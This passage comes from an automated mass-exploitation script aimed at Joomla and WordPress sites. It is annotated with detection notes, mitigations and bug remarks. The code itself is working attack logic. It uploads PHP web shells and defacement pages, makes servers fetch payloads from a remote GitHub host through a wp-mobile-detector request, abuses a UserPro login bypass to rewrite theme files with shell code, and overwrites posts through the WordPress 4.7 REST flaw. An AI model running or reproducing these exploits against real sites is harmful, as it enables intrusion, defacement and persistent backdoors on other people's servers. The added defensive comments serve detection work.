  957. if '"jsonrpc"' in GoT.text.encode('utf-8'):
  958. requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
  959. requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
  960. Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
  961. Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
  962. Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
  963. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  964. CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  965.  
        # the three branches below are identical apart from which of the three
        # /tmp/plupload/ responses carried the marker
  966. if 'Vuln!!' in Check.text.encode('utf-8'):
  967. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  968. self.Print_vuln_Shell(site + '/images/vuln.php')
  969. with open('result/Shell_results.txt', 'a') as writer:
  970. writer.write(site + '/images/vuln.php' + '\n')
  971. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  972. self.Print_Vuln_index(site + '/vuln.htm')
  973. with open('result/Index_results.txt', 'a') as writer:
  974. writer.write(site + '/vuln.htm' + '\n')
  975. else:
  976. self.Com_AdsManager(site)
  977. elif 'Vuln!!' in Check2.text.encode('utf-8'):
  978. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  979. self.Print_vuln_Shell(site + '/images/vuln.php')
  980. with open('result/Shell_results.txt', 'a') as writer:
  981. writer.write(site + '/images/vuln.php' + '\n')
  982. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  983. self.Print_Vuln_index(site + '/vuln.htm')
  984. with open('result/Index_results.txt', 'a') as writer:
  985. writer.write(site + '/vuln.htm' + '\n')
  986. else:
  987. self.Com_AdsManager(site)
  988. elif 'Vuln!!' in Check3.text.encode('utf-8'):
  989. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  990. self.Print_vuln_Shell(site + '/images/vuln.php')
  991. with open('result/Shell_results.txt', 'a') as writer:
  992. writer.write(site + '/images/vuln.php' + '\n')
  993. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  994. self.Print_Vuln_index(site + '/vuln.htm')
  995. with open('result/Index_results.txt', 'a') as writer:
  996. writer.write(site + '/vuln.htm' + '\n')
  997. else:
  998. self.Com_AdsManager(site)
  999. else:
  1000. self.Com_AdsManager(site)
  1001. except:
  1002. self.Com_AdsManager(site)
  1003.  
  1004. def JCE_shell(self, site):
        # POSTs a local file as 'Filedata' to the com_jce imgmanager upload form,
        # and when the reply echoes the file name sends a second request whose JSON
        # body calls folderRename to move it to images/vuln.php. It then checks
        # /images/vuln.php for the marker 'Vuln!!' and records a hit in
        # result/Shell_results.txt. self.Jce_Test(site) is called on every path,
        # including after a recorded hit.
        # Detection notes: POSTs to option=com_jce with plugin=imgmanager, a JSON
        # body containing "folderRename" with a .php destination, and a new
        # /images/vuln.php are the indicators.
        # Mitigation: update JCE, restrict the editor's file manager to
        # authenticated users, and disable script execution under /images/.
  1005. try:
  1006. fileShell = {'Filedata': open(self._shell, 'rb')}
  1007. post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
  1008. Exp = 'http://' + site +\
  1009. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
  1010. Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
  1011. OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
  1012. if OtherMethod in Post.text.encode('utf-8'):
  1013. PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
  1014. + "\",\"./../../images/vuln.php\"]}"}
  1015. try:
  1016. privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
  1017. 'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
  1018. requests.post(privExploit, data=PrivMethod, timeout=5)
  1019. try:
  1020. VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
  1021. if 'Vuln!!' in VulnCheck.text:
  1022. self.Print_vuln_Shell(site + '/images/vuln.php')
  1023. with open('result/Shell_results.txt', 'a') as writer:
  1024. writer.write(site + '/images/vuln.php' + '\n')
  1025. self.Jce_Test(site)
  1026. else:
  1027. self.Jce_Test(site)
  1028. except:
  1029. self.Jce_Test(site)
  1030. except:
  1031. self.Jce_Test(site)
  1032.  
  1033. else:
  1034. self.Jce_Test(site)
  1035. except:
  1036. self.Jce_Test(site)
  1037.  
  1038. def Jce_Test(self, site):
        # POSTs the local image as 'Filedata' to the com_jce imgmanager upload form
        # with upload-dir '../../'; when the reply does not echo the file name it
        # retries with upload-dir '../'. A hit is printed and appended to
        # result/Index_results.txt without fetching the file back, so the result
        # rests on the server's reply alone.
        # Detection notes: an 'upload-dir' form value containing "../" is the
        # request signature; the image appearing in the web root or under /images/
        # is the on-disk artefact.
        # Mitigation: update JCE and reject upload directories that resolve
        # outside the configured media root.
  1039. try:
  1040. fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
  1041. post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
  1042. Exp = 'http://' + site +\
  1043. '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
  1044. Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
  1045. OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
  1046. if OtherMethod in Post.text.encode('utf-8'):
  1047. self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
  1048. with open('result/Index_results.txt', 'a') as writer:
  1049. writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
        # this elif is the exact negation of the if above, so the final else
        # of this chain can never run
  1050. elif OtherMethod not in Post.text.encode('utf-8'):
  1051. post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
  1052. Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
  1053. if OtherMethod in Post.text.encode('utf-8'):
  1054. self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
  1055. with open('result/Index_results.txt', 'a') as writer:
  1056. writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
  1057. else:
  1058. self.Print_NotVuln('Com_JCE', site)
  1059. else:
  1060. self.Print_NotVuln('Com_JCE', site)
  1061. except:
  1062. self.Print_NotVuln('Com_JCE', site)
  1063.  
  1064.  
  1065. def alberghiExploit(self, site):
        # Fetches com_alberghi's upload.alberghi.php under /administrator/, and when
        # the page shows the 'userfile' input POSTs the local image to it, then
        # tries to fetch the image from the same directory and record it in
        # result/Index_results.txt when the body contains 'GIF89a'.
        # Detection notes: direct requests to
        # /administrator/components/com_alberghi/upload.alberghi.php from
        # unauthenticated clients are the signature; component scripts under
        # /administrator/ should not be reachable without a session.
        # Mitigation: remove or update the component and block direct access to
        # component PHP files at the web server.
  1066. try:
  1067. fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
  1068. Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
  1069. Check = requests.get(Exp, timeout=5)
  1070. if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
  1071. Post = requests.post(Exp, files=fileDeface, timeout=5)
        # NOTE(review): `'has been successfully' or <expr>` is always truthy, so
        # the server's reply is never actually inspected here
  1072. if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
        # NOTE(review): this URL is built without the 'http://' prefix used
        # everywhere else; assuming `site` is a bare host name, requests will
        # raise and the outer except reports "not vulnerable" even though the
        # POST above has already been sent — absence from the tool's results
        # is therefore no evidence that the upload failed
  1073. CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
  1074. self.Jce_Deface_image.split('/')[1], timeout=5)
  1075. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1076. with open('result/Index_results.txt', 'a') as writer:
  1077. writer.write(site + '/administrator/components/com_alberghi/' +
  1078. self.Jce_Deface_image.split('/')[1] + '\n')
  1079. self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
  1080. self.Jce_Deface_image.split('/')[1])
  1081. else:
  1082. self.Print_NotVuln('com_alberghi', site)
  1083. else:
  1084. self.Print_NotVuln('com_alberghi', site)
  1085. else:
  1086. self.Print_NotVuln('com_alberghi', site)
  1087. except:
  1088. self.Print_NotVuln('com_alberghi', site)
  1089.  
  1090. def CateGory_page_icons(self, site):
        # Probes for the category-page-icons WordPress plugin by requesting its
        # css/menu.css; on HTTP 200 it POSTs the local image to
        # include/wpdev-flash-uploader.php with dir_icons '../../../', then fetches
        # the image from /wp-content/ and records the URL in
        # result/Index_results.txt when the body contains 'GIF89a'.
        # Detection notes: a GET for the plugin's menu.css followed by a POST to
        # wpdev-flash-uploader.php with a 'dir_icons' value containing "../" is the
        # sequence to look for; a stray image directly under wp-content/ is the
        # on-disk artefact.
        # Mitigation: remove or update the plugin and block direct access to
        # plugin PHP files that are not meant as entry points.
  1091. try:
  1092. ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
  1093. if ChckVln.status_code == 200:
  1094. Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
  1095. fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
  1096. PostDAta = {'dir_icons': '../../../',
  1097. 'submit': 'upload'}
  1098. requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
  1099. CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
  1100. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1101. with open('result/Index_results.txt', 'a') as writer:
  1102. writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
  1103. self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
  1104. else:
  1105. self.Print_NotVuln('CateGory_page_icons', site)
  1106. else:
  1107. self.Print_NotVuln('CateGory_page_icons', site)
  1108. except:
  1109. self.Print_NotVuln('CateGory_page_icons', site)
  1110.  
  1111.  
  1112. def Downloads_Manager(self, site):
        # Probes for the downloads-manager WordPress plugin by requesting its
        # img/unlock.gif; when that returns a GIF it POSTs the local image to the
        # site root with the form field 'dm_upload', checks the plugin's upload/
        # directory for it, then repeats the POST with a local PHP file, requests
        # that file once, and looks for the marker 'Vuln!!' at /wp-content/vuln.php.
        # Hits are appended to result/Shell_results.txt and/or
        # result/Index_results.txt.
        # Detection notes: multipart POSTs to "/" carrying 'dm_upload' and 'upfile',
        # new files under wp-content/plugins/downloads-manager/upload/, and
        # /wp-content/vuln.php or /vuln.htm appearing afterwards are the indicators.
        # Mitigation: remove or update the plugin and disable PHP execution in
        # plugin upload directories.
  1113. try:
  1114. Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
  1115. if 'GIF89a' in Checkvuln.text.encode('utf-8'):
  1116. PostDAta = {'dm_upload': ''}
  1117. fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
  1118. fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
  1119. requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
        # this GET passes no timeout, unlike the other requests in the method
  1120. CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
  1121. self.Jce_Deface_image.split('/')[1])
  1122. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1123. requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
  1124. requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
  1125. self.pagelinesExploitShell.split('/')[1], timeout=5)
  1126. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1127. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1128. self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
  1129. self.pagelinesExploitShell.split('/')[1])
  1130. self.Print_Vuln_index(site + '/vuln.htm')
  1131. with open('result/Shell_results.txt', 'a') as writer:
  1132. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
  1133. self.pagelinesExploitShell.split('/')[1] + '\n')
  1134. with open('result/Index_results.txt', 'a') as writer:
  1135. writer.write(site + '/vuln.htm' + '\n')
  1136. else:
  1137. self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
  1138. self.Jce_Deface_image.split('/')[1])
  1139. with open('result/Index_results.txt', 'a') as writer:
  1140. writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
  1141. self.Jce_Deface_image.split('/')[1] + '\n')
  1142. else:
  1143. self.Print_NotVuln('Downloads-Manager', site)
  1144. else:
  1145. self.Print_NotVuln('Downloads-Manager', site)
  1146. except:
  1147. self.Print_NotVuln('Downloads-Manager', site)
  1148.  
  1149. def GetWordpressPostId(self, zzz):
        # Fetches /wp-json/wp/v2/posts/ from host `zzz` and returns the text captured
        # between '"id":' and ',"date"' for the SECOND match in the response
        # (index 1), stripped of whitespace.
        # Returns None when the request fails or fewer than two matches exist
        # (bare except below).
        # Detection note: anonymous enumeration of /wp-json/wp/v2/posts/ shortly
        # before a write attempt against the same route is worth correlating.
  1150. try:
  1151. PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
  1152. wsx = re.findall('"id":(.+?),"date"', PostId.text)
  1153. postid = wsx[1].strip()
  1154. return postid
  1155. except:
  1156. pass
  1157.  
  1158. def wp_content_injection(self, site):
        # Looks up a post id with self.GetWordpressPostId, then POSTs a JSON body to
        # /wp-json/wp/v2/posts/<id> whose 'id' field is the same id with the letters
        # 'bbx' appended, replacing the post's title and content with a marker
        # string. It then fetches /x.htm and records the URL in
        # result/Index_results.txt when the body contains 'Vuln!!'.
        # The tool's own label for this check names WordPress 4.7.
        # Detection notes: an unauthenticated POST to /wp-json/wp/v2/posts/<n>
        # whose body 'id' is not purely numeric is the request signature; post
        # revisions containing the marker text are the content artefact.
        # Mitigation: update WordPress core; review post revisions and restore
        # any that were overwritten.
  1159. try:
  1160. zaq = self.GetWordpressPostId(site)
  1161. headers = {'Content-Type': 'application/json'}
        # GetWordpressPostId returns None on failure, in which case str(zaq) is
        # the literal 'None' and the request below still goes out
  1162. xxx = str(zaq) + 'bbx'
  1163. data = json.dumps({
  1164. 'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
  1165. 'title': 'Vuln!! Path it now!!',
  1166. 'id': xxx,
  1167. 'link': '/x-htm/',
  1168. 'slug': '"/x-htm/"'
  1169. })
  1170. GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
        # a requests Response is truthy when its status code is below 400
  1171. if GoT:
  1172. CheckIndex = 'http://' + site + '/x.htm'
  1173. zcheck = requests.get(CheckIndex, timeout=10)
  1174. if 'Vuln!!' in zcheck.text:
  1175. self.Print_Vuln_index(site + '/x.htm')
  1176. with open('result/Index_results.txt', 'a') as writer:
  1177. writer.write(site + '/x.htm' + '\n')
  1178. else:
  1179. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1180. else:
  1181. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1182. except:
  1183. self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
  1184.  
  1185. def Wp_Job_Manager(self, site):
        # Requests /jm-ajax/upload_file/ and, when the reply contains '"files":[]',
        # POSTs the local image as 'file[]' to the same endpoint, extracts the
        # returned "url" value, rebuilds the path under /wp-content, fetches it and
        # records it in result/Index_results.txt when the body contains 'GIF89a'.
        # Detection notes: anonymous GET then POST to /jm-ajax/upload_file/ is the
        # sequence to look for; the uploaded file's location comes from the
        # server's own reply, so check the plugin's upload folder for unexpected
        # files rather than a fixed path.
        # Mitigation: update the plugin and require authentication (or disable)
        # its AJAX upload endpoint.
  1186. try:
  1187. Exploit = '/jm-ajax/upload_file/'
  1188. CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
  1189. if '"files":[]' in CheckVuln.text.encode('utf-8'):
  1190. try:
  1191. IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
  1192. GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
  1193. GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
        # cut at the first '"', un-escape JSON's "\/", keep what follows
        # '/wp-content'
  1194. IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
  1195. UploadedIndEX = site + '/wp-content' + IndeXpath
  1196. Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
  1197. if 'GIF89a' in Checkindex.text.encode('utf-8'):
  1198. self.Print_Vuln_index(UploadedIndEX)
  1199. with open('result/Index_results.txt', 'a') as writer:
  1200. writer.write(UploadedIndEX + '\n')
  1201. else:
  1202. self.Print_NotVuln('Wp-Job-Manager', site)
  1203. except:
  1204. self.Print_NotVuln('Wp-Job-Manager', site)
  1205. else:
  1206. self.Print_NotVuln('Wp-Job-Manager', site)
  1207. except:
  1208. self.Print_NotVuln('Wp-Job-Manager', site)
  1209.  
  1210.  
  1211. def wp_mobile_detector(self, site):
        # Requests the wp-mobile-detector plugin's resize.php; when the reply
        # contains 'GIF89a' it calls resize.php?src=<remote URL> twice, pointing at
        # two files hosted on raw.githubusercontent.com, then checks the plugin's
        # cache/ directory for both file names and finally /wp-content/vuln.php and
        # /vuln.htm for the marker 'Vuln!!'. Hits are appended to
        # result/Shell_results.txt and/or result/Index_results.txt.
        # Detection notes: resize.php?src= with an external URL in the access log,
        # outbound HTTP from the web server to raw.githubusercontent.com, and
        # pwn.gif or settings_auto.php in the plugin's cache/ directory are the
        # indicators.
        # Mitigation: remove or update the plugin, restrict outbound connections
        # from web servers, and disable PHP execution in cache directories.
  1212. try:
  1213. ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
  1214. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
  1215. ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
  1216. 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
  1217.  
  1218. Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
  1219. GoT = requests.get('http://' + site + Ex, timeout=5)
  1220. if 'GIF89a' in GoT.text.encode('utf-8'):
        # neither of the next two requests passes a timeout
  1221. requests.get('http://' + site + ExploitGifUpload)
  1222. requests.get('http://' + site + ExploitShell)
  1223. PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
  1224. PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
  1225. Check1 = 'http://' + site + PathGif
  1226. Check2 = 'http://' + site + PathShell
  1227. CheckIndex = requests.get(Check1, timeout=5)
  1228. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1229. CheckShell = requests.get(Check2, timeout=5)
  1230. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1231. Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
  1232. if 'Vuln!!' in Xshell.text.encode('utf-8'):
  1233. self.Print_vuln_Shell(site + "/wp-content/vuln.php")
  1234. with open('result/Shell_results.txt', 'a') as writer:
  1235. writer.write(site + "/wp-content/vuln.php" + '\n')
  1236. Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
  1237. if 'Vuln!!' in Xindex.text.encode('utf-8'):
  1238. self.Print_Vuln_index(site + '/vuln.htm')
  1239. with open('result/Index_results.txt', 'a') as writer:
  1240. writer.write(site + '/vuln.htm' + '\n')
  1241. else:
  1242. self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
  1243. with open('result/Index_results.txt', 'a') as writer:
  1244. writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
  1245. else:
  1246. self.Print_NotVuln('wp-mobile-detector', site)
  1247. else:
  1248. self.Print_NotVuln('wp-mobile-detector', site)
  1249. except:
  1250. self.Print_NotVuln('wp-mobile-detector', site)
  1251.  
  1252. def get_WpNoncE(self, source):
        # Returns the value attribute of the first hidden <input> with
        # id="_wpnonce" name="_wpnonce" found in the HTML string `source`, stripped
        # of whitespace. Returns None when nothing matches (bare except below).
        # The regex depends on the exact attribute order shown in the pattern.
  1253. try:
  1254. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
  1255. path = find[0].strip()
  1256. return path
  1257. except:
  1258. pass
  1259.  
  1260. def get_WpFlag(self, source):
        # Returns the value of the first <option ... selected="selected"> element in
        # the HTML string `source`, stripped of whitespace; the caller in this file
        # uses it as the active theme's directory name. Returns None when nothing
        # matches (bare except below).
  1261. try:
  1262. find = re.findall('<option value="(.*?)" selected="selected">', source)
  1263. path = find[0].strip()
  1264. return path
  1265. except:
  1266. pass
  1267.  
  1268. def UserProExploit(self, site):
        # Opens a session, requests /?up_auto_log=true and then /wp-admin/; when the
        # admin page shows the logout bar it records the site in
        # result/AdminTakeover_results.txt, uses the theme editor to overwrite the
        # active theme's search.php with self.shell_code, and then tries to upload
        # a local Access.php through that page. Resulting URLs are appended to
        # result/Shell_results.txt.
        # Detection notes: a request carrying up_auto_log=true immediately followed
        # by authenticated /wp-admin/theme-editor.php activity from the same
        # client, the fixed Firefox/36.0 User-Agent below, a modified search.php or
        # a new Access.php in the active theme directory are the indicators.
        # Mitigation: update or remove the UserPro plugin, set DISALLOW_FILE_EDIT
        # in wp-config.php so the theme editor is unavailable, and verify theme
        # files against a known-good copy.
  1269. try:
  1270. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  1271. 'Accept': '*/*'}
  1272. exploit = '/?up_auto_log=true'
  1273. sess = requests.session()
  1274. admin_re_page = 'http://' + site + '/wp-admin/'
  1275. sess.get('http://' + site + exploit, timeout=10, headers=headers)
  1276. Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
  1277. if '<li id="wp-admin-bar-logout">' in Check_login.text:
  1278. with open('result/AdminTakeover_results.txt', 'a') as writer:
  1279. writer.write(site + exploit + '\n')
  1280. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
  1281. ___Get_edit = admin_re_page + 'theme-editor.php'
  1282. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
  1283. source = Get_source.text
        # both helpers return None when their pattern is absent; a None theme
        # name makes the string concatenation further down raise, which the
        # outer except reports as "not vulnerable" although the admin session
        # was already recorded above
  1284. _Wp_FlaG = self.get_WpFlag(source)
  1285. _Wp_NoncE = self.get_WpNoncE(source)
  1286. __data = {'_wpnonce': _Wp_NoncE,
  1287. '_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
  1288. 'newcontent': self.shell_code,
  1289. 'action': 'update',
  1290. 'file': 'search.php',
  1291. 'theme': _Wp_FlaG,
  1292. 'scrollto': '0',
  1293. 'docs-list': '',
  1294. 'submit': 'Update+File'}
  1295. sess.post(___Get_edit, data=__data, headers=headers)
  1296. shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
  1297. Check_sHell = sess.get(shell_PaTh, headers=headers)
  1298. if 'wordpress_project' in Check_sHell.text:
  1299. __po = {'_upl': 'Upload'}
        # opened relative to the current working directory, not under files/
  1300. fil = {'file': open('Access.php', 'rb')}
  1301. requests.post(shell_PaTh, data=__po, files=fil)
  1302. shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
  1303. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
  1304. if 'b374k' in Got_Shell.text:
  1305. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
  1306. with open('result/Shell_results.txt', 'a') as writer:
  1307. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
  1308. else:
  1309. self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
  1310. with open('result/Shell_results.txt', 'a') as writer:
  1311. writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
  1312. else:
  1313. self.Print_NotVuln('UserPro', site)
  1314. else:
  1315. self.Print_NotVuln('UserPro', site)
  1316. except:
  1317. self.Print_NotVuln('UserPro', site)
  1318.  
  1319.  
  1320. def formcraftExploit_Shell(self, site):
        # Requests the formcraft plugin's file-upload/server/content/upload.php; when
        # the reply contains '"failed"' it POSTs a local PHP file as 'files[]',
        # reads the server-assigned "new_name" from the reply, requests that file
        # under .../content/files/, and then looks for the marker 'Vuln!!' at
        # /wp-content/vuln.php and /vuln.htm. Hits are appended to
        # result/Shell_results.txt and result/Index_results.txt; every other
        # outcome falls through to self.formcraftExploitIndeX(site).
        # Detection notes: anonymous GET then multipart POST to formcraft's
        # upload.php, a GET for a file under .../content/files/, and the later
        # appearance of /wp-content/vuln.php or /vuln.htm are the indicators.
        # Mitigation: update or remove the plugin, enforce an extension allowlist on
        # uploads, and disable PHP execution in the plugin's files/ directory.
  1321. try:
  1322. ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
  1323. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
  1324. Check = requests.get(Exp, timeout=5)
  1325. if '"failed"' in Check.text.encode('utf-8'):
  1326. GoT = requests.post(Exp, files=ShellFile, timeout=5)
  1327. if 'new_name' in GoT.text.encode('utf-8'):
  1328. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
  1329. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
  1330. + GetIndexName[0].split('"')[0]
  1331. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  1332. if CheckIndex.status_code == 200:
  1333. CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1334. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1335. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1336. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1337. with open('result/Shell_results.txt', 'a') as writer:
  1338. writer.write(site + '/wp-content/vuln.php' + '\n')
  1339. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
  1340. self.Print_Vuln_index(site + '/vuln.htm')
  1341. with open('result/Index_results.txt', 'a') as writer:
  1342. writer.write(site + '/vuln.htm' + '\n')
  1343. else:
  1344. self.formcraftExploitIndeX(site)
  1345. else:
  1346. self.formcraftExploitIndeX(site)
  1347. else:
  1348. self.formcraftExploitIndeX(site)
  1349. else:
  1350. self.formcraftExploitIndeX(site)
  1351. except:
  1352. self.formcraftExploitIndeX(site)
  1353.  
  1354. def formcraftExploitIndeX(self, site):
        # Requests the formcraft plugin's file-upload/server/content/upload.php; when
        # the reply contains '"failed"' it POSTs the local image as 'files[]', reads
        # the server-assigned "new_name" from the reply, fetches that file under
        # .../content/files/ and records the path in result/Index_results.txt when
        # the body contains 'GIF89a'.
        # Detection notes: anonymous GET then multipart POST to formcraft's
        # upload.php and new files under .../content/files/ are the indicators;
        # the stored name is chosen by the server, so review the directory listing
        # rather than searching for a fixed file name.
        # Mitigation: update or remove the plugin and require a valid form
        # submission context (nonce) for uploads.
  1355. try:
  1356. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
  1357. Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
  1358. Check = requests.get(Exp, timeout=5)
  1359. if '"failed"' in Check.text.encode('utf-8'):
  1360. GoT = requests.post(Exp, files=ShellFile, timeout=5)
  1361. if 'new_name' in GoT.text.encode('utf-8'):
  1362. GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
  1363. IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
  1364. + GetIndexName[0].split('"')[0]
  1365. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
  1366. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
  1367. self.Print_Vuln_index(IndexPath)
  1368. with open('result/Index_results.txt', 'a') as writer:
  1369. writer.write(IndexPath + '\n')
  1370. else:
  1371. self.Print_NotVuln('formcraft', site)
  1372. else:
  1373. self.Print_NotVuln('formcraft', site)
  1374. else:
  1375. self.Print_NotVuln('formcraft', site)
  1376. except:
  1377. self.Print_NotVuln('formcraft', site)
  1378.  
  1379.  
  1380.  
  1381. def cherry_plugin(self, site):
        # POSTs the local file self.pagelinesExploitShell to the Cherry Plugin
        # import/export upload script on `site`, requests the uploaded copy, then
        # looks for the marker string 'Vuln!!' at /wp-content/vuln.php and
        # /vuln.htm. Hits are printed and appended to result/*.txt.
        #
        # NOTE(review): indentation was lost in this paste; the pairing of the two
        # `else:` lines with the three `if` lines is not recoverable from here.
        # NOTE(review): the content of the uploaded file is not on this page;
        # presumably it creates vuln.php / vuln.htm when it runs -- confirm.
        #
        # Defender note: the upload is sent without any session or credential.
        # Signs of this routine on a host are a POST to
        # .../cherry-plugin/admin/import-export/upload.php, an unexpected .php file
        # beside that script, and new files /wp-content/vuln.php or /vuln.htm.
        # Update or remove the plugin and block PHP execution in plugin data
        # directories.
  1382. try:
  1383. ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
  1384. , 'multipart/form-data')}
  1385. Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
  1386. aa = requests.post(Exp, files=ShellFile, timeout=5)
        # The uploaded file is expected in the same directory as upload.php, under
        # the base name of the local path.
  1387. Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
